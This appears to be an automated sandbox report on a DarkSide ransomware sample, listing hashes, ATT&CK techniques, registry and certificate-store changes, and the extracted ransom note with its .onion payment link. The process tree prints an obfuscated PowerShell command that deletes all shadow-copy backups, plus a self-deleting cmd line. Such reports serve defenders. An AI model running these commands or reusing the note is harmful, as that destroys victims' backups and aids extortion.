darkside | 93cb3d33780673999559924e7df3f1d930ab9eda4ce61f8c6fed80547c8b7234

General

Target

485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Size

58KB
MD5

485b9fd90d99ec5e6683fa4448924da8
SHA1

744d07feeaa7cb10b11d5ec72418bd1ecbbba819
SHA256

93cb3d33780673999559924e7df3f1d930ab9eda4ce61f8c6fed80547c8b7234
SHA512

3734e195e9a9a73a5ae0b8daa88b62303da69a2734312448cf26d469c2a811e0ebe4bfd0b90f56e6bf1998d1b4baccece7811bcb78bec1f196819e289f45a0b6
SSDEEP

768:ZjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylvMpY23W58:Cx7Fu4/ihrhDTV1ylvMSZ58

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\README.3f8e9045.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (183) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

3240 cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
3240	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\3f8e9045.BMP"	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\3f8e9045.BMP"	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Control Panel 1 IoCs

evasion

Processes:

485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Control Panel\Desktop\WallpaperStyle = "10"	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

Modifies registry class 5 IoCs

Processes:

485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.3f8e9045	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.3f8e9045\ = "3f8e9045"	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\3f8e9045\DefaultIcon	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\3f8e9045	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\3f8e9045\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\3f8e9045.ico"	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

pid process

268 powershell.exe
2912 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
2912 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

pid	process
268	powershell.exe
2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeSecurityPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeTakeOwnershipPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeLoadDriverPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeSystemProfilePrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeSystemtimePrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeProfSingleProcessPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeIncBasePriorityPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeCreatePagefilePrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeBackupPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeRestorePrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeShutdownPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeDebugPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeSystemEnvironmentPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeRemoteShutdownPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeUndockPrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeManageVolumePrivilege	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: 33	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: 34	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: 35	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeBackupPrivilege	2744	vssvc.exe
Token: SeRestorePrivilege	2744	vssvc.exe
Token: SeAuditPrivilege	2744	vssvc.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

description	pid	process	target process
PID 2912 wrote to memory of 268	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe	powershell.exe
PID 2912 wrote to memory of 268	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe	powershell.exe
PID 2912 wrote to memory of 268	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe	powershell.exe
PID 2912 wrote to memory of 268	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe	powershell.exe
PID 2912 wrote to memory of 3240	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe	cmd.exe
PID 2912 wrote to memory of 3240	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe	cmd.exe
PID 2912 wrote to memory of 3240	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe	cmd.exe
PID 2912 wrote to memory of 3240	2912	485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
"C:\Users\Admin\AppData\Local\Temp\485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\485B9F~1.EXE >> NUL
2⤵
- Deletes itself
PID:3240

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2744

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
34eb10aeb88f61a118a6812d09f086c5

SHA1
6d3b5bca8335007bfef363bb220db753ffa84fff

SHA256
ba44c0ffe950de4ac3697492f5ea746e37508cd8dc4267d7fe7fb1b405e75682

SHA512
2ae589a1641f02d369c9b5d3e5d831f0c46238e71ab1d9d782d573f64ef6a38d9e4ae1cadf02fa0a79b47d2ff1e7ac04daea0fb460d346950fa34812fa93db84

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
eaceb8f4a46099cb3873b860bcca34c1

SHA1
6bea32b8a425ca692a2df4d7d612322c28a25f86

SHA256
737b0667f49028839573005c20794a2aab9f7b9ea3c7e6253ffd65ce9e449e69

SHA512
45d698e771bdd52037316fa32f8b28e046351b35d32e135ebddfbc449dd54f0b0c37dda70a27022e37ea931d486dba6e6bb002d3ad38c86534ca26d16dba0068

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC92B.tmp
Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarCB9E.tmp
Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
e7cce87c72a98155ad342be0f13b5504

SHA1
ca393115c8f9bf19a77d60a8ffddb2be3864c79a

SHA256
4f8fdef37fb7d60f746709b3de640cde9c8073cd40279c83b8ffa960bf6be7ef

SHA512
e2e6c9c80c4ccb528a0ef6d8c55a3c5bff4589f352873ca7a39f1a0c2906a1c55fd5930c5b8b7ee9647b8ff9ee5e158e71a93d624970d03d55f046de8d791910

Download Submit
C:\Users\Admin\README.3f8e9045.TXT
Filesize
1KB

MD5
65494ea6831e577d82fac2b91b9c3d43

SHA1
5c23717d22ee9b94306f2d5a2a53c60aca03eb8c

SHA256
5e98b41a51606e16dda30ad4a49457227f75d71ad2004e2942c6b8de6202c4f3

SHA512
28ba13f7793ac8271af03b26eaeba6cbe707bf1f07fb1792818a6ab270d1c20d0091ef4a10c092f60c373aefe09698d2b470ec6a7f8cfa47103fd8bbb8d7a7bb

Download Submit
memory/268-136-0x000000001B210000-0x000000001B4F2000-memory.dmp

Filesize
2.9MB

Download
memory/268-138-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/268-137-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/268-139-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/268-140-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/268-135-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/268-133-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/268-134-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads